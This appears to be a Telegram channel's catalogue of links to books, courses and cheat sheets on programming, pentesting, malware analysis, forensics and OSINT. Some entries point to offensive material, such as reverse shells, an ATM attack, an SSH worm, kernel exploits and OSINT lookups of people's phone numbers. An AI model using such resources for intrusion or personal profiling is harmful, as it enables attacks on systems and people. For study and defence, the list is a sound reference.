Седер Наоми.](https://t.me/S_E_Book/1107) - Впервые на русском языке выходит новое издание одной из самых популярных книг издательства Manning. С помощью этой книги вы можете быстро перейти от основ к управлению и структурам данных, чтобы создавать, тестировать и развертывать полноценные приложения. Наоми Седер рассказывает не только об основных особенностях языка Python, но и его объектно-ориентированных возможностях, которые появились в Python 3. Данное издание учитывает все изменения, которые произошли с языком за последние 5 лет, а последние 5 глав рассказывают о работе с большими данными. * [Чистый Python. Тонкости программирования для профи.](https://t.me/S_E_Book/1160) - Изучение всех возможностей Python - сложная задача, а с этой книгой вы сможете сосредоточиться на практических навыках, которые действительно важны. Раскопайте "скрытое золото" в стандартной библиотеке Python и начните писать чистый код уже сегодня. * [Джульен Данжу: Путь Python. Черный пояс по разработке, масштабированию, тестированию и развертыванию. 2020.](https://t.me/S_E_Book/1226) - "Путь Python" позволяет отточить ваши профессиональные навыки и узнать как можно больше о возможностях самого популярного языка программирования. Эта книга написана для разработчиков и опытных программистов. Вы научитесь писать эффективный код, создавать лучшие программы за минимальное время и избегать распространенных ошибок. Пора познакомиться с многопоточными вычислениями и мемоизацией, получить советы экспертов в области дизайна API и баз данных, а также заглянуть внутрь Python, чтобы расширит понимание языка. ## Программирование Eng Книги по программированию на Английском языке. * [Learn Java 12 Programming.](https://t.me/S_E_Book/1178) - Java is one of the preferred languages among developers, used in everything right from smartphones, and game consoles to even supercomputers, and its new features simply add to the richness of the language. This book on Java programming begins by helping you learn how to install the Java Development Kit. You will then focus on understanding object-oriented programming (OOP), with exclusive insights into concepts like abstraction, encapsulation, inheritance, and polymorphism, which will help you when programming for real-world apps. * [Modern Python Cookbook: The latest in modern Python recipes for the busy modern programmer.](https://t.me/S_E_Book/700) - The recipes take a problem-solution approach to resolve issues commonly faced by Python programmers across the globe. You will be armed with the knowledge of creating applications with flexible logging, powerful configuration, and command-line options, automated unit tests, and good documentation. * [Python for Finance Cookbook.](https://t.me/S_E_Book/701) - This book is for financial analysts, data analysts, and Python developers who want to learn how to implement a broad range of tasks in the finance domain. Data scientists looking to devise intelligent financial strategies to perform efficient financial analysis will also find this book useful. Working knowledge of the Python programming language is mandatory to grasp the concepts covered in the book effectively. * [Learning Python for Forensics: Leverage the power of Python in forensic investigations, 2nd Edition.](https://t.me/S_E_Book/723) - The second edition of Learning Python for Forensics will illustrate how to develop Python scripts using an iterative design. Further, it demonstrates how to leverage the various built-in and community-sourced forensics scripts and libraries available for Python today. This book will help strengthen your analysis skills and efficiency as you creatively solve real-world problems through instruction-based tutorials. * [Mastering Python Scripting for System Administrators.](https://t.me/S_E_Book/753) - This book will initially cover Python installation and quickly revise basic to advanced programming fundamentals. The book will then focus on the development process as a whole, from setup to planning to building different tools. It will include IT administrators' routine activities (text processing, regular expressions, file archiving, and encryption), network administration (socket programming, email handling, the remote controlling of devices using telnet/ssh, and protocols such as SNMP/DHCP), building graphical user interface, working with websites (Apache log file processing, SOAP and REST APIs communication, and web scraping), and database administration (MySQL and similar database data administration, data analytics, and reporting). * [Effective Python Penetration Testing.](https://t.me/S_E_Book/763) - Penetration testing is a practice of testing a computer system, network, or web application to find weaknesses in security that an attacker can exploit. Effective Python Penetration Testing will help you utilize your Python scripting skills to safeguard your networks from cyberattacks. We will begin by providing you with an overview of Python scripting and penetration testing. You will learn to analyze network traffic by writing Scapy scripts and will see how to fingerprint web applications with Python libraries such as ProxMon and Spynner. * [Python for Offensive PenTest.](https://t.me/S_E_Book/792) - This book is packed with step-by-step instructions and working examples to make you a skilled penetration tester. It is divided into clear bite-sized chunks, so you can learn at your own pace and focus on the areas of most interest to you. This book will teach you how to code a reverse shell and build an anonymous shell. You will also learn how to hack passwords and perform a privilege escalation on Windows with practical examples. You will set up your own virtual hacking environment in VirtualBox, which will help you run multiple operating systems for your testing environment. * [Learning Python Networking.](https://t.me/S_E_Book/794) - Starting with a walk through of today's major networking protocols, through this book, you'll learn how to employ Python for network programming, how to request and retrieve web resources, and how to extract data in major formats over the web. You will utilize Python for emailing using different protocols, and you'll interact with remote systems and IP and DNS networking. You will cover the connection of networking devices and configuration using Python 3.7, along with cloud-based network management tasks using Python. * [Python Crash Course: A Hands-On, Project-Based Introduction to Programming.](https://t.me/S_E_Book/1113) - In the first half of the book, you'll learn about basic programming concepts, such as lists, dictionaries, classes, and loops, and practice writing clean and readable code with exercises for each topic. You'll also learn how to make your programs interactive and how to test your code safely before adding it to a project. In the second half of the book, you'll put your new knowledge into practice with three substantial projects: a Space Invaders-inspired arcade game, data visualizations with Python's super-handy libraries, and a simple web app you can deploy online. * [Python System Administration.](https://t.me/S_E_Book/1013) - In this book, you will find several projects in the categories of network administration, web server administration, and monitoring and database management. In each project, we will define the problem, design the solution, and go through the more interesting implementation steps.This book explains and shows how to apply Python scripting in practice. Unlike the majority of the Python books, it will show you how to approach and resolve real-world issues that most system administrators will come across in their careers.Each project is accompanied with the source code of a fully working prototype, which you’ll be able to use immediately or adapt to your requirements and environment. * [Expert Python Programming.](https://t.me/S_E_Book/1170) - The book will start by taking you through the new features in Python 3.7. You'll then learn the advanced components of Python syntax, in addition to understanding how to apply concepts of various programming paradigms, including object-oriented programming, functional programming, and event-driven programming. * [Microservices Security in Action.](https://t.me/S_E_Book/1184) - Microservices Security in Action teaches you how to address microservices-specific security challenges throughout the system. This practical guide includes plentiful hands-on exercises using industry-leading open-source tools and examples using Java and Spring Boot. * [List of Free Python Resources.](https://t.me/S_E_Book/1233) - Python is considered as a beginner-friendly programming language and its community provides many free resources for beginners and more advanced users. Our team had gathered the most helpful free materials about Python. Below you will find the whole list. If we missed something, that you would like to recommend leave a comment! We will update our list! * [Learning Python Networking.](https://t.me/S_E_Book/1258) - As the book progresses, socket programming will be covered, followed by how to design servers, and the pros and cons of multithreaded and event-driven architectures. You'll develop practical clientside applications, including web API clients, email clients, SSH, and FTP. These applications will also be implemented through existing web application frameworks. ## Arduino RU Книги, видео, полезный материал на тему Arduino. На Русском языке. * [Изучаем Arduino. Инструменты и методы технического волшебства | Блум Джереми.](https://t.me/S_E_Book/431) - Книга посвящена проектированию электронных устройств на основе микроконтроллерной платформы Arduino. Приведены основные сведения об аппаратном и программном обеспечении Arduino. Изложены принципы программирования в интегрированной среде Arduino IDE. Показано, как анализировать электрические схемы, читать технические описания, выбирать подходящие детали для собственных проектов. Приведены примеры использования и описание различных датчиков, электродвигателей, сервоприводов, индикаторов, проводных и беспроводных интерфейсов передачи данных. В каждой главе перечислены используемые комплектующие, приведены монтажные схемы, подробно описаны листинги программ. Имеются ссылки на сайт информационной поддержки книги. * [Программируем Arduino. Профессиональная работа со скетчами | Монк Саймон.](https://t.me/S_E_Book/431) - Прочитав книгу, вы научитесь использовать прерывания, управлять памятью, выполнять цифровую обработку сигналов, освоите многозадачность и сможете создавать собственные библиотеки. * [Юрий Меншиков – Ардуино на пальцах.](https://t.me/S_E_Book/432) - Или как студенту, не знающему ничего о микроконтроллерах, научиться программировать платформу Arduino с нуля. * [Распиновка Малинки.](https://t.me/S_E_Book/261) * [Схемы подключения разного железа к Arduino. Без примеров кода.](https://t.me/S_E_Book/432) * [Простейший сниффер на ESP8266.](https://t.me/S_E_Book/506) - Использование ESP8266 для подсчета уникальных mac-адресов wifi устройств в зоне приема. * [Атака на банкомат с помощью Raspberry Pi.](https://t.me/S_E_Book/660) * [Arduino-reference.](https://t.me/S_E_Book/1111) - Полный список команд языка Ардуино. По ссылке представлен список всех (или почти всех) доступных “из коробки” команд для Arduino с кратким описанием и примерами. ## Arduino Eng Книги, видео, полезный материал на тему Arduino. На Английском языке. * [Getting Started with Raspberry Pi Zero.](https://t.me/S_E_Book/751) - Raspberry Pi Zero is half the size of Raspberry Pi A, only with twice the utility. At just three centimeters wide, it packs in every utility required for full-fledged computing tasks. This practical tutorial will help you quickly get up and running with Raspberry Pi Zero to control hardware and software and write simple programs and games. You will learn to build creative programs and exciting games with little or no programming experience. We cover all the features of Raspberry Pi Zero as you discover how to configure software and hardware, and control external devices. You will find out how to navigate your way in Raspbian, write simple Python scripts, and create simple DIY programs. * [Penetration Testing with Raspberry Pi.](https://t.me/S_E_Book/839) - Создаем хакерский арсенал для пентеста с помощью Kali Linux и Raspberry Pi. Если ты ищешь малобюджетный, хакерский инструмент с малым форм-фактором для удаленного доступа, то идей в этой книге хватает с головой. Для понимания информации из этой книги, тебе не нужно быть опытным хакером или программистом. Достаточно будет свободно времени и желания изучить данный материал. ## Reverse Eng * [Android App Reverse Engineering.](https://t.me/S_E_Book/837) - Бесплатный курс по реверсу Android приложений. * [Android Apk Reverse Engineering.](https://t.me/S_E_Book/1069) * [Reverse Engineering/Forensics/Malware Analysis/Cybercrime Research – General Resources.](https://t.me/S_E_Book/1030) ## Bug Hunting Eng * [Hands-On Bug Hunting for Penetration Testers.](https://t.me/S_E_Book/847) - Используйте WP Scan и другие инструменты для поиска уязвимостей в приложениях WordPress, Django и Ruby on Rails; SQL, внедрение кода и сканеры; Узнайте, как проверить на наличие общих ошибок; Откройте для себя инструменты и методы этического взлома, и многое другое.... * [Real-World Bug Hunting: A Field Guide to Web Hacking.](https://t.me/S_E_Book/1050) - You'll learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery. Using real-life case studies of rewarded vulnerabilities from applications like Twitter, Facebook, Google, and Uber, you'll see how hackers manage to invoke race conditions while transferring money, use URL parameter to cause users to like unintended tweets, and more. ## Malware analysis RU Книги и курсы на Русском языке * [Курс - Анализ вирусных файлов - Malware analysis.](https://t.me/S_E_Book/443) - Курс представляет собой начальную ступень в изучении анализа вредоносных файлов. Он послужит также хорошей отправной точкой для всех, кто желает стать вирусным аналитиком и специалистом по информационной безопасности. * [Анализ вредоносных программ | Монаппа К. А.](https://t.me/S_E_Book/484) - Изучите концепции, инструментальные средства и методы анализа и исследования вредоносных программ для Windows Создание безопасной и изолированной лабораторной среды для анализа вредоносных программ. * [Сикорски Майкл, Хониг Эндрю. Вскрытие покажет! Практический анализ вредоносного ПО.](https://t.me/S_E_Book/497) - Анализ вредоносного ПО напоминает игру в кошки-мышки: никаких правил, ситуация постоянно меняется. Поэтому в данном случае имеет смысл изучать лишь неустаревающие вещи и алгоритмы. Как только перед вами встает задача защитить сеть (или тысячу сетей), вы приступаете к такому анализу, и без этой книги вам попросту не обойтись. * [Android Malware Sandbox.](https://t.me/S_E_Book/521) - виртуальная машина для быстрого запуска малвари. * [История компьютерных вирусов (Перевод).](https://t.me/S_E_Book/617) * [Превращение ssh клиента в червя.](https://t.me/S_E_Book/873) ## Malware analysis Eng Книги и курсы на Английском языке * [Mastering Malware Analysis.](https://t.me/S_E_Book/703) - With the proliferation of technology and increase in prominent ransomware attacks, malware analysis has become a trending topic in recent years. With the help of this book, you'll be able to mitigate the risk of encountering malicious code and malware. Mastering Malware Analysis explains the universal patterns behind different malicious software types and how to analyze them using a variety of approaches. You'll learn how to examine malware code, determine the damage it can cause to your systems, and prevent it from propagating. This book even covers all aspects of malware analysis for the Windows platform in detail. As you advance, you'll get to grips with obfuscation as well as delve into anti-disassembly, anti-debugging, and anti-virtual machine techniques. Throughout the course of this book, you'll explore real-world examples of static and dynamic malware analysis, unpacking and decrypting, and rootkit detection, and learn to deal with modern cross-platform malware. Finally, you'll study how to strengthen your defenses and prevent malware breaches for IoT devices and mobile platforms. * [Malware Data Science: Attack Detection and Attribution.](https://t.me/S_E_Book/767) - Malware Data Science explains how to identify, analyze, and classify large-scale malware using machine learning and data visualization. Security has become a "big data" problem. The growth rate of malware has accelerated to tens of millions of new files per year while our networks generate an ever-larger flood of security-relevant data each day. In order to defend against these advanced attacks, you'll need to know how to think like a data scientist. In Malware Data Science, security data scientist Joshua Saxe introduces machine learning, statistics, social network analysis, and data visualization, and shows you how to apply these methods to malware detection and analysis. * [Learning Malware Analysis.](https://t.me/S_E_Book/770) - This book introduces you to the basics of malware analysis, and then gradually progresses into the more advanced concepts of code analysis and memory forensics. It uses real-world malware samples, infected memory images, and visual diagrams to help you gain a better understanding of the subject and to equip you with the skills required to analyze, investigate, and respond to malware-related incidents. * [Practical Binary Analysis: Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly.](https://t.me/S_E_Book/1164) - This hands-on guide teaches you how to tackle the fascinating but challenging topics of binary analysis and instrumentation and helps you become proficient in an area typically only mastered by a small group of expert hackers. It will take you from basic concepts to state-of-the-art methods as you dig into topics like code injection, disassembly, dynamic taint analysis, and binary instrumentation. ## CTF * [Список библиотек, ресурсов, ПО и учебных пособий.](https://t.me/S_E_Book/608) * [Exploits in Wetware by Robert Sell.](https://t.me/S_E_Book/904) - В этом ролике, Rober Sell делится своим опытом неоднократного участия в DEF CON CTF, демонстрируя, насколько легко добыть конфиденциальную информацию из любой организации. Рассказывает, как добыл сотни «точек данных» целевой организации, применяя методы OSINT, а так же без особых усилий смог добыть у своей жертвы информацию о VPN, ОС, об уровне патчей, номера мобильников топ-менеджеров и места их жительства. * [Essential CTF Tools.](https://t.me/S_E_Book/1084) ## Android Безопасность, приложения, книги, статьи. * [Коллекция ресурсов, связанных с безопасностью Android.](https://t.me/S_E_Book/1009) - Онлайн-анализаторы, инструменты статического анализа, сканеры уязвимостей приложений, инструменты динамического анализа и многое другое... ## Termux * [Termux: Основы, утилиты, скрипты.](https://t.me/Social_engineering/1112) * [Sqlmap в Termux.](https://t.me/Social_engineering/1063) * [Nmap в Termux.](https://t.me/Social_engineering/1044) * [WebSploit в Termux.](https://t.me/Social_engineering/995) * [UserRecon в Termux.](https://t.me/Social_engineering/915) * [Tool-X. Устанавливаем 370+ инструментов в Termux.](https://t.me/Social_engineering/1112) * [Metasploit-Framework в Termux.](https://t.me/Social_engineering/842) ## iOS Безопасность, приложения, книги, статьи. * [Writing an iOS Kernel Exploit from Scratch.](https://t.me/S_E_Book/1019) - Написание эксплойта для ядра iOS. * [Заражение macOS через макросы в документах и 0day.](https://t.me/S_E_Book/1025) ## Анонимность и безопасность * [Nipe — скрипт для создания TOR сети как шлюза по умолчанию.](https://t.me/S_E_Book/172) - Tor позволяет пользователям путешествовать по интернету, общаться и отправлять мгновенные сообщения анонимно. Он используется широким спектром людей как для законных, так и для незаконных целей. Nipe — это скрипт, чтобы сделать Tor Network вашим шлюзом по умолчанию. * [Актуальный список и анализатор XMPP-серверов.](https://t.me/S_E_Book/173) - Представляет из себя самопополняемый список XMPP-серверов и анализатор по типу xmpp.net.Работает уже больше 2х лет. Актуальных серверов около 10к. Проверяет c2s, s2s и наличие In-Band регистрации. Возможно добавлять свои Jabber-сервера на анализ, получать картинку-значок с актуальной инфой (а-ля badge на xmpp.net). Скачивать полный список в CSV и XLS форматах, а также искать по списку. * [Prism Break - Защита от глобальных систем слежки (COPM,PRISM,XKeyscore и т.п).](https://t.me/S_E_Book/226) * [Подборка хранилищ с готовыми образами для вируальных машин VirtualBox и VMWare. Очень удобно для быстрого развертывания в качестве стендов для экспериментов.](https://t.me/S_E_Book/230) * [Подборка ресурсов для проверки уровня личной приватности и безопасности в сети.](https://t.me/S_E_Book/231) * [Как работает самая мощная интернет-цензура в мире: история создания «Золотого щита» в Китае.](https://t.me/S_E_Book/252) - Уже 15 лет в Китае работает самая мощная в мире интернет-цензура — «Золотой щит». Власти КНР создали её под предлогом защиты гостайны, борьбы с порно и идеологически вредными материалами. Китайцам запретили посещать зарубежные сайты, читать иностранную прессу и высказывать недовольство компартией, а присматривать за населением поставили специальную интернет-полицию и армию проправительственных блогеров. * [Мобильная лаборатория на Android для тестирования на проникновение.](https://t.me/S_E_Book/260) * [Как быть анонимным в эпоху наблюдения?](https://t.me/S_E_Book/447) * [Статья о том, как хакеры рассекречивают звенья цепи Tor.](https://t.me/S_E_Book/504) * [Сервисы для удаления своих учётных записей с сервисов.](https://t.me/S_E_Book/544) * [Конференция DEFCON 26. Виляние хвостом: скрытое пассивное наблюдение.](https://t.me/S_E_Book/661) - В наш цифровой век технически грамотных противников мы забываем о том, что существует необходимость использования физического наблюдения за целью методами «старой школы». Многие организации используют группы наблюдения: внутренние для правительственных учреждений или внешние, нанятые для выполнения конкретной задачи. Цели этих групп варьируются от подозреваемых в терроризме до людей, обвиняемых в фиктивных страховых исках. ## OSINT Книги, ресурсы, полезный материал. * [osintframework - ресурсы для OSINT.](https://t.me/S_E_Book/147) - Основа OSINT это сбор информации из открытых источников. Цель состоит в том, чтобы помочь людям найти бесплатные инструменты для использования OSINT. Некоторые из указанных тут сайтов могут потребовать регистрации, но чаще всего есть бесплатный аналог. Это старый, но очень полезный инструмент, и если вы еще его не добавили в свой арсенал, самое время это сделать. * [КОНКУРЕНТНАЯ РАЗВЕДКА В КОМПЬЮТЕРНЫХ СЕТЯХ.](https://t.me/S_E_Book/169) - Книга посвящена рассмотрению вопросов интернет-разведки - сегменту конкурентной разведки, охватывающему процедуры сбора и обработки информации, проводимые с целью поддержки принятия управленческих решений, повышения конкурентоспособности исключительно из открытых источников в компьютерных сетях - веб-пространства, блогосферы, форумов, социальных сетей. Рассматриваются различные вопросам информационно-аналитической деятельности в сетевой среде, ориентированной на задачи конкурентной разведки. * [Shodan Manual.](https://t.me/S_E_Book/91) - Руководство пользователя Shodan. Переведено на русский язык. * [OSINT для Нетсталкинга.](https://t.me/S_E_Book/449) - Использование техник и приёмов OSINT для нетсталкинга. * [Разбор конкурса «Конкурентная разведка» на PHDays 9.](https://t.me/S_E_Book/552) - Отличный разбор конкурса «Конкурентная разведка» на PHDays 9. Куча интересных кейсов и нестандартных способов для получения информации из открытых источников. * [Список инструментов OSINT с открытым исходным кодом.](https://t.me/S_E_Book/597) * [Сбор информации о цели.](https://t.me/S_E_Book/857) - Пентестеры и специалисты по безопасности ценят 2 вещи — время и экономящие его инструменты. Чтобы вручную просканировать выбранную цель, тебе потребуется время на развертывание инфраструктуры, установку софта и сканирование. Выбираешь сканирование вручную - сталкиваешься с проблемами. Например, рейт-лимиты (ограниченное количество запросов). Существует сервис, который поможет свести трату времени к нулю. И дает всю необходимую информацию о цели за секунды. * [Operator Handbook: Red Team + OSINT + Blue Team Reference.](https://t.me/S_E_Book/865) - 123 списка наиболее часто используемых инструментов, 400 страниц контента. * [OSINT Toolkit.](https://t.me/S_E_Book/890) * [Список инструментов OSINT с открытым исходным кодом.](https://t.me/S_E_Book/890) * [Ищем уязвимости в TikTok при помощи OSINT.](https://t.me/S_E_Book/919) * [Инструменты OSINT, которые ускорят исследования в сети.](https://t.me/S_E_Book/920) * [Как представители разных профессий вас пробивают.](https://t.me/S_E_Book/941) * [OSINT в Instagram.](https://t.me/S_E_Book/982) * [Разоблачение коррупционеров с помощью открытой информации.](https://t.me/S_E_Book/990) * [Поиск сведений о номере телефона, шаг за шагом.](https://t.me/S_E_Book/1057) ## Сторонняя литература * [Джордж Оруэлл.1984.RU](https://t.me/S_E_Book/5) - «1984» — роман-антиутопия Джорджа Оруэлла, изданный в 1949 году. Роман «1984» наряду с такими произведениями как «Мы» Евгения Замятина, «О дивный новый мир» Олдоса Хаксли и «451 градус по Фаренгейту» Рэя Брэдбери, считается одним из образцов антиутопии. * [Эдвард Сноуден. Личное дело.](https://t.me/S_E_Book/415) - Мемуары Сноудена – это биография мальчишки, который вырос в свободном Интернете и в итоге стал его совестью и защитником. Это глубоко личная история, в которой, как в зеркале, отражается поразительная трансформация не только Америки, но и всего мира в целом. Сочетая трогательные рассказы о «хакерской» юности и становлении Интернета с безжалостной «внутренней кухней» американской разведки, книга Сноудена представляет собой важнейшие мемуары цифровой эпохи. * [Досье Сноудена. История самого разыскиваемого человека в мире.](https://t.me/S_E_Book/686) - Журналист, корреспондент газеты Guardian Люк Хардинг в своей документальной книге представил на суд читателей последовательность драматических событий истории одного из самых выдающихся компьютерных хакеров и беспрецедентного разоблачителя шпионских интернетовских сетей мирового уровня Эдварда Сноудена, не побоявшегося бросить вызов американскому Агентству национальной безопасности и его союзникам. Книга Хардинга со всей беспристрастной, выстроенной исключительно на фактах экспертизой деятельности крупнейшего в мире агентства, его тактикой наблюдений в то же время представляет своего героя как человека, который отчаянно любит свою страну, чем и оправдываются все его действия. * [Негде спрятаться. Эдвард Сноуден и зоркий глаз Дядюшки Сэма.](https://t.me/S_E_Book/688) - Добро пожаловать в реальный мир! Скрытое наблюдение больше не миф. Бывший сотрудник АНБ Эдвард Сноуден раскрывает тайны, вызывающие шок и трепет. Оказывается, частной жизни нет. Всюду и везде за нами наблюдает Большой Брат. Беспрецедентную глобальную электронную слежку осуществляет Агентство национальной безопасности, а конфиденциальное общение между людьми перестает быть возможным. * [Викиликс: Секретные файлы.](https://t.me/S_E_Book/659) - Под редакцией Джулиана Ассанжа. * [WikiLeaks: Разоблачения, изменившие мир.](https://t.me/S_E_Book/907) - В этой книге собраны все самые последние и сенсационные материалы с сайта Wikileaks Джулиана Ассанжа. ## Honeypots * [Honeypots and Routers: Collecting Internet Attacks.](https://t.me/S_E_Book/979) - As the number of Internet-based consumer transactions continues to rise, the need to protect these transactions against hacking becomes more and more critical. An effective approach to securing information on the Internet is to analyze the signature of attacks in order to build a defensive strategy. This book explains how to accomplish this using honeypots and routers. It discusses honeypot concepts and architecture as well as the skills needed to deploy the best honeypot and router solutions for any network environment. ## Форензика Инструменты, книги, статьи, полезные ресурсы. RU \ Eng * [Подборка бесплатных утилит компьютерной криминалистики (форензики).](https://t.me/S_E_Book/448) * [Форензика. Бесплатные инструменты и ресурсы с открытым исходным кодом.](https://t.me/S_E_Book/600) * [Полезные материалы об особенностях форензики в Windows 10.](https://t.me/S_E_Book/652) * [Форензика. Теория и практика расследования киберпреступлений. Шелупанов А.А, Смолина А.Р](https://t.me/S_E_Book/652) - В книге представлен анализ существующих подходов в современной отечественной практике расследования киберпреступлений. На основе накопленного практического опыта проведения экспертиз преступлений в сфере высоких технологий предложен подход по их унификации. Будет полезна преподавателям, аспирантам и студентам, обучающимся по направлениям в области юриспруденции, защиты информации, информационной безопасности. * [Volatility Framework.](https://t.me/S_E_Book/673) - фреймворк для исследования образов содержимого оперативной памяти и извлечения цифровых артефактов из энергозависимой памяти (RAM). * [Learning Network Forensics.](https://t.me/S_E_Book/726) - The book starts with an introduction to the world of network forensics and investigations. You will begin by getting an understanding of how to gather both physical and virtual evidence, intercepting and analyzing network data, wireless data packets, investigating intrusions, and so on. You will further explore the technology, tools, and investigating methods using malware forensics, network tunneling, and behaviors. By the end of the book, you will gain a complete understanding of how to successfully close a case. * [Practical Windows Forensics.](test) - Over the last few years, the wave of the cybercrime has risen rapidly. We have witnessed many major attacks on the governmental, military, financial, and media sectors. Tracking all these attacks and crimes requires a deep understanding of operating system operations, how to extract evident data from digital evidence, and the best usage of the digital forensic tools and techniques. Regardless of your level of experience in the field of information security in general, this book will fully introduce you to digital forensics. It will provide you with the knowledge needed to assemble different types of evidence effectively, and walk you through the various stages of the analysis process. * [Learning Android Forensics.](https://t.me/S_E_Book/732) - If you are a forensic analyst or an information security professional wanting to develop your knowledge of Android forensics, then this is the book for you. Some basic knowledge of the Android mobile platform is expected. * [Practical Digital Forensics.](https://t.me/S_E_Book/737) - In this book you will explore new and promising forensic processes and tools based on ‘disruptive technology' that offer experienced and budding practitioners the means to regain control of their caseloads. During the course of the book, you will get to know about the technical side of digital forensics and various tools that are needed to perform digital forensics. This book will begin with giving a quick insight into the nature of digital evidence, where it is located and how it can be recovered and forensically examined to assist investigators. This book will take you through a series of chapters that look at the nature and circumstances of digital forensic examinations and explains the processes of evidence recovery and preservation from a range of digital devices, including mobile phones, and other media. This book has a range of case studies and simulations will allow you to apply the knowledge of the theory gained to real-life situations. * [Mobile Forensics - Advanced Investigative Strategies.](https://t.me/S_E_Book/778) - We begin by helping you understand the concept of mobile devices as a source of valuable evidence. Throughout this book, you will explore strategies and "plays" and decide when to use each technique. We cover important techniques such as seizing techniques to shield the device, and acquisition techniques including physical acquisition (via a USB connection), logical acquisition via data backups, over-the-air acquisition. We also explore cloud analysis, evidence discovery and data analysis, tools for mobile forensics, and tools to help you discover and analyze evidence. * [iOS Forensics Cookbook.](https://t.me/S_E_Book/782) - If you are an iOS application developer who wants to learn about a test flight, hockey app integration, and recovery tools, then this book is for you. This book will be helpful for students learning forensics, as well as experienced iOS developers. * [Mastering Mobile Forensics.](https://t.me/S_E_Book/784) - Mobile forensics presents a real challenge to the forensic community due to the fast and unstoppable changes in technology. This book aims to provide the forensic community an in-depth insight into mobile forensic techniques when it comes to deal with recent smartphones operating systems. * [Practical Mobile Forensics - Second Edition.](https://t.me/S_E_Book/786) - A hands-on guide to mastering mobile forensics for the iOS, Android, and the Windows Phone platforms About This Book Get to grips with the basics of mobile forensics and the various forensic approaches Retrieve and analyze the data stored on mobile devices and on the loud A practical guide to leverage the power of mobile forensics on the popular mobile platforms with lots of tips, tricks and caveats Who This Book Is For This book is for forensics professionals who are eager to widen their forensics skillset to mobile forensics and acquire data from mobile devices. * [Fundamentals of Digital Forensics.](https://t.me/S_E_Book/1188) - This hands-on textbook provides an accessible introduction to the fundamentals of digital forensics. The text contains thorough coverage of the theoretical foundations, explaining what computer forensics is, what it can do, and also what it can’t. A particular focus is presented on establishing sound forensic thinking and methodology, supported by practical guidance on performing typical tasks and using common forensic tools. Emphasis is also placed on universal principles, as opposed to content unique to specific legislation in individual countries. * [Форензика Android: взлом графического ключа.](https://t.me/S_E_Book/1001) * [10 инструментов для форензики, которые работают в Linux.](https://t.me/S_E_Book/1047) * [Top 20 Free Digital Forensic Investigation Tools for SysAdmins.](https://t.me/S_E_Book/1048) * [Awesome Forensics.](https://t.me/S_E_Book/1094) - Curated list of awesome free (mostly open source) forensic analysis tools and resources. * [Practical Cyber Forensics.](https://t.me/S_E_Book/1241) - Become an effective cyber forensics investigator and gain a collection of practical, efficient techniques to get the job done. ## Изучение английского языка * [Английский язык для специалистов в области интернет-технологий.](https://t.me/S_E_Book/26) - Книга нацелена на формирование и развитие у читателей навыков использования английского языка в сфере профессиональной коммуникации. В конце издания представлены тесты для текущего контроля знаний, дополнительные тексты для аннотирования и задания для устного тестирования, а также даны ключи и ответы к некоторым заданиям. * [Очень много YouTube-каналов для прокачки английского языка для программистов.](https://t.me/S_E_Book/860) - С помощью YouTube можно ощутимо и сравнительно быстро улучшить английский. Понимание на слух как минимум. Истина не нова, но мало кто смотрит английский YouTube, потому что легко потеряться в бесконечности каналов. Но для вас я собрал самые стоящие каналы! ## CheatSheet * [Linux Commands. Cheat Sheet.](https://t.me/S_E_Book/1092) * [Linux Commands. Cheat Sheet. v2.](https://t.me/S_E_Book/742) * [Linux Commands. Cheat Sheet. v3.](https://t.me/S_E_Book/895) * [Kali Linux. Cheat Sheet.](https://t.me/S_E_Book/1054) * [Pentesting Cheat Sheet.](https://t.me/S_E_Book/1037) * [Awesome Pentest Cheat Sheets.](https://t.me/S_E_Book/1156) * [Penetration Testing Tools. Cheat Sheet.](https://t.me/S_E_Book/1090) * [Windows Red Team Cheat Sheet.](https://t.me/S_E_Book/1191) * [Wireshark.Cheat Sheet.](https://t.me/S_E_Book/1052) * [Wireshark Cheat Sheets v2.](https://t.me/S_E_Book/1222) * [Wireshark display filters.Cheat Sheet.](https://t.me/S_E_Book/1103) * [Nmap. Cheat Sheet.](https://t.me/S_E_Book/1071) * [Nmap - Cheatsheet. v2.](https://t.me/S_E_Book/1039) * [Шпаргалка по Tcpdump.](https://t.me/S_E_Book/1031) * [tcpdump Cheat Sheet.](https://t.me/S_E_Book/1174) * [Metasploit.Cheat Sheet.](https://t.me/S_E_Book/1053) * [Metasploit.Cheat Sheet. v2.](https://t.me/S_E_Book/1093) * [Metasploit.Cheat Sheet. v3.](https://t.me/S_E_Book/898) * [Hydra. Cheat Sheet.](https://t.me/S_E_Book/1070) * [Empire. Cheat Sheet.](https://t.me/S_E_Book/1078) * [PowerSploit. Cheat Sheet.](https://t.me/S_E_Book/1079) * [Responder - Cheat Sheet.](https://t.me/S_E_Book/1039) * [Aircrack-ng. Cheat Sheet.](https://t.me/S_E_Book/1091) * [SQLMap. Cheat Sheet.](https://t.me/S_E_Book/1105) * [OSINT. Cheat Sheet.](https://t.me/S_E_Book/1101) * [OSCP Cheat Sheet.](https://t.me/S_E_Book/1175) * [Awesome CTF Cheatsheet.](https://t.me/S_E_Book/1177) * [Capture The Flag Cheatsheet.](https://t.me/S_E_Book/1197) * [SQL Injection Cheat Sheet.](https://t.me/S_E_Book/888) * [SQL Window Functions Cheat Sheet.](https://t.me/S_E_Book/1182) * [JavaScript. Cheat Sheet.](https://t.me/S_E_Book/1112) * [Python Cheat Sheet.](https://t.me/S_E_Book/1112) * [Python Cheat Sheet. v2.](https://t.me/S_E_Book/1116) ## Прочее Ресурсы и статьи. * [Хорошая статья с анализом самого сложного андроид трояна.](https://t.me/S_E_Book/265) - Троян шифровал все строки, включая адреса С&C и расшифровывал их с помощью парсинга главной страницы facebook.com. Он брал элементы со страницы и использовал их для хэширования. Еще троян содержал два 0-day, один вызывал ошибку в DEX2JAR, популярном инструменте для анализа малвари, второй - эксплуатировал парсинг androidmanifest.xml. * [Бесплатные облачные сервисы для расшифровки дампов сетевого трафика.](https://t.me/S_E_Book/276) * [Уязвимость в iOS, которая затрагивает все модели с iPhone 4s - iPhone X.](https://t.me/S_E_Book/282) * [Конференция BLACK HAT USA. Разбогатеть или умереть: зарабатываем в Интернете методами Black Hat.](https://t.me/S_E_Book/346) * [Как в ЦРУ десятилетиями читали зашифрованную переписку союзников и противников.](https://t.me/S_E_Book/526) - Более полувека правительства всех стран доверяли единственной компании сокрытие переписки, которую вели их шпионы, солдаты и дипломаты. * [По следу Cobalt: тактика логической атаки на банкоматы.](https://t.me/S_E_Book/530) - В июле 2016 года работа First Bank, одного из крупнейших банков Тайваня, была парализована. Банк столкнулся с масштабной атакой: люди в масках одновременно опустошили три десятка банкоматов на $2 млн. 